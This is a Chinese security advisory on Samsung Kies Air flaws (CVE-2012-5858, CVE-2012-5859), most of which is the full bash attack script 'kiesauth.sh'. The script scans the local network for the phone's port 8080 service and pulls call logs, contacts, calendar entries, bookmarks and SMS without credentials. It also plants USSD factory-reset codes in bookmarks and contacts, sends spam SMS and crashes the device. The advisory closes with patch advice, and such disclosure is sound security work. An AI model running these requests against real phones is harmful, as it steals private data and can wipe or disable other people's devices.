发布日期:2012-11-15
更新日期:2012-11-17

受影响系统:
Samsung Kies Air 2.1.210161
Samsung Kies Air 2.1.207051
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56560
CVE ID: CVE-2012-5858,CVE-2012-5859

Kies air是一款行动应用程式,可通过Wi-Fi将电脑与手机连接,并可使用浏览器加以管理。Samsung Kies Air 2.1.207051、2.1.210161及其他版本存在安全漏洞,攻击者利用这些漏洞可绕过某些安全限制或造成拒绝服务。从下文的测试脚本可以看出,相关请求均发往手机上 TCP 8080 端口的 Kies Air Web 服务,且脚本中的请求不携带任何凭据。

<*来源:Claudio J. Lacayo*>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/bash
echo " ... "
# Banner: ASCII art followed by the script's own metadata (file name, date,
# author handle, presentation and whitepaper links, version, description).
# These lines are evidently meant as display text only.
# NOTE(review): the art reached this page with damaged quoting (page
# extraction); it is kept exactly as published.
echo " .."",."
echo " ,cl:."
echo " ,dOo""
echo " .."""""". .,,. .". "," "" .". ",. ,, .lXXd."
echo " .x0dllllllc kMWN. ;K: cMMM: ;Kk. c0d. :W0. .0Ml :NW0c"
echo " kK" cMxcWO ;K: "NK:WN. .k0; .xKc :WX" .KWo "WMM0."
echo " O0. .NX. dMc ;K: .XW, cWk lKl "Ok" :WN" .KN: .",;;,"......."lWMMX""
echo " O0. .KW; .KN" ;K: kMd xM: ;0O0d ,XX".KW, .KMMK:. ...."".. "
echo " O0. ,c xMXllccOMX. ;K: :MWdclldWN. .kKK; .XNNN; 0MMk "
echo " O0. dK. :MK:;;;;;kMk ;K: .NX:;;;;;oWK. "Ok,lKl "WMc dWMO."
echo " kK. dK. .XX. .0M: ;Kl kW; xMx l0d ;0k. NM; .cKWk,"
echo " :Kk,.."""xK. kM: .XX. .kKl""...... oMx .KW; .xKc .k0; NM; "lO0c."
echo " .;loooool; .xl ,x; ,cooooooo, .dd. .xl co" co. dx. .;oo:."
echo " ",... "
echo " ..."
echo " Samsung S3 Kies Air Scanner - v.1.3 www.samsung.com/us/kies/"
echo ""
echo ""
echo "
#################################################################################################################"
echo " Filename : kiesauth.sh"
echo " Date : 10/23/2012"
echo " Authors : @cron__"
echo " Presentation : http://www.slideshare.net/firmware/kies-air-launch-steal-crash"
echo " Whitepaper : http://dl.dropbox.com/u/7779799/SamsungKiesAirAuthorizationBypassandDoS.pdf"
echo " Version : 1.3"
echo " Description : Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones."
echo "
#################################################################################################################"
echo ""
# Main menu loop. Reads a choice and dispatches:
#   1 = scan for hosts with TCP 8080 open, then send requests to one host
#       whose address the operator types in;
#   2 = send a single request to ssd.php on a hard-coded address.
# Defender view: every request below goes to port 8080 on the handset and
# carries no credentials, cookie or token. The request paths in this listing
# (/www/..., /ws/...) are what to look for in captures on the Wi-Fi segment.
# NOTE(review): statements were fused and wrapped by page extraction; the code
# is kept byte-for-byte as published.
echo ""while true; do
printf "%s
" "1) Scan local network"
printf "%s
" "2) Send DoS"
printf "
%s " "Enter an option:"read option# Option 1
# Dispatch on the menu choice read above.
case $option in
# Choice 1: show the local interface addresses, then read the scan start
# address into ipstart.
[1]) ip=`ifconfig | awk /inet /`
echo $ip
echo "Type in your IP: "read ipstart
echo -e "Scanning in progress...
"
# nmap TCP SYN scan (-sS) of port 8080 from the typed address up to last
# octet 254; awk then keeps the report lines that mention an Android host, an
# open port or Samsung. Both files are appended to (>>), so they also retain
# results from earlier runs.
sudo nmap -sS -p 8080 ${ipstart}-254 -vv >> nmap_scan.txt
awk "/Nmap scan report for Android/ || /open/ || /Samsung/" nmap_scan.txt >> ka_online.txt
printf "%s
" "Active servers found: "
cat ka_online.txt
printf "%s " "Was a server found? type "y" or "n" and press [Enter]"read connect
if [ $connect = y ]
then
echo "Enter the target IP and press [Enter]"
read target_found
# Requests the Kies Air start page from the typed host. The exit status is
# not checked, so the "We have access" prompt below is printed either way.
wget --ignore-length --quiet http://${target_found}:8080/www/index.gz.html
printf "
%s
" "1) Grab logs (incoming/outgoing calls)"
printf "%s
" "2) Grab address book"
printf "%s
" "3) Grab calendar events (experimental)"
printf "%s
" "4) Grab bookmarks"
printf "%s
" "5) Grab SMS (incoming/outgoing)"
printf "%s
" "6) Send remote wipe"
printf "
%s " "We have access, what would you like to do?"read action
# Choices 1-5 are read requests: each saves one /ws/ response (call log,
# contacts, calendar instances, bookmarks, SMS) to a local text file.
# Choice 6 opens a submenu of write requests.
case $action in
[1]) wget --ignore-length --quiet -O call_log.txt
http://${target_found}:8080/ws/telephony/log?startIndex=0&maxItems=500&sort=time-descending ;;
[2]) wget --ignore-length --quiet -O addressbook.txt
http://${target_found}:8080/ws/pim/contacts?startIndex=0&maxItems=100&sort=alpha-ascending ;;
[3]) wget --ignore-length --quiet -O calendar_events.txt
http://${target_found}:8080/ws/calendar/instances/1348977600/1352606400?searchQuery=calendarId:1calendarId:2&1351121143933
;;
[4]) wget --ignore-length --quiet -O bookmarks.txt
http://${target_found}:8080/ws/browser/bookmarks?startIndex=0&maxItems=100&sort=time-descending ;;
[5]) wget --ignore-length --quiet -O messages.txt
http://${target_found}:8080/ws/messaging/messages?startIndex=0&maxItems=10&sort=timestamp_descending ;;
[6]) printf "
%s
" "1) Add remote wipe as a bookmark"
printf "%s
" "2) Replace the default AT&T bookmark link with remote wipe"
printf "%s
" "3) Replace contact information with remote wipe and mark it as favorite"
printf "%s
" "4) Add remote wipe to address book and mark it as favorite"
printf "%s
" "5) Send spam SMS"
printf "
%s " "Choose an option:"read wipe_option
# Write requests against the same service: POST to /ws/browser/bookmarks,
# PUT and POST to /ws/pim/contacts, POST to /ws/messaging/sms/messages.
# 192.168.1.132 and contact id 37 are hard-coded values, presumably from the
# author's own setup. Choice 2 only prints a message.
case $wipe_option in
[1]) wipe1=`wget --ignore-length --server-response --quiet --post-data
"url=http://192.168.1.132%2Fremotewipe.html&title=AT%26T%20Mobile%20Web"
http://${target_found}:8080/ws/browser/bookmarks` ;;
[2]) echo "DELETE method not supported by wget." ;;
[3]) wipe3=`curl -O curl_response.txt -X PUT -d
"title=&firstName=Vicky&lastName=&suffix=&nickName=&homePhoneNo=&workPhoneNo=&mobilePhoneNo=*2767*3855%23&defaultPhoneNo=-1&workEmail=&homeEmail=&otherEmail=&organisation=&jobTitle=&favourite=true&accountType=Phone&accountName=Phone"
http://${target_found}:8080/ws/pim/contacts/37` ;;
[4]) wipe4=`wget --ignore-length --quiet --post-data "title=&firstName=CALL FOR A SEXY
TIME&lastName=&suffix=&nickName=&homePhoneNo=&workPhoneNo=&mobilePhoneNo=*2767*3855%23&defaultPhoneNo=-1&workEmail=&homeEmail=&otherEmail=&organisation=&jobTitle=&favourite=true&accountType=Phone&accountName=Phone"
http://${target_found}:8080/ws/pim/contacts` echo -e "Entry added." ;;
[5]) wipe5=`wget --ignore-length --quiet --post-data
"folderId=&destination=tel:111&destinationContactId=&destinationName=&body=Hey click this link!
goatse.cx&mimeType=text/plain" http://${target_found}:8080/ws/messaging/sms/messages` ;;esac
esacelif [ $connect = n ]
then
printf "%s" "No available targets found."
else
printf "%s" "Not a valid entry. Aborted."
fi;;# Option 2: Manually specify this for now.
# Choice 2 of the main menu: one request to ssd.php on the hard-coded address
# 192.168.1.136. The success message is printed without checking the result.
[2]) t1=`wget --quiet -p "http://192.168.1.136:8080/www/apps/KiesAir/jws/ssd.php?E&&"` echo -e "Crash successfully
sent to device.
" ;;
esac
echo -e "Script reloaded.
"
done

建议:
--------------------------------------------------------------------------------
厂商补丁:Samsung
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://samsungapps.sina.cn/supportMain/getSupportMainList.as

在完成升级之前,建议仅在可信的 Wi-Fi 网络中启用 Kies Air,并在不使用时将其关闭。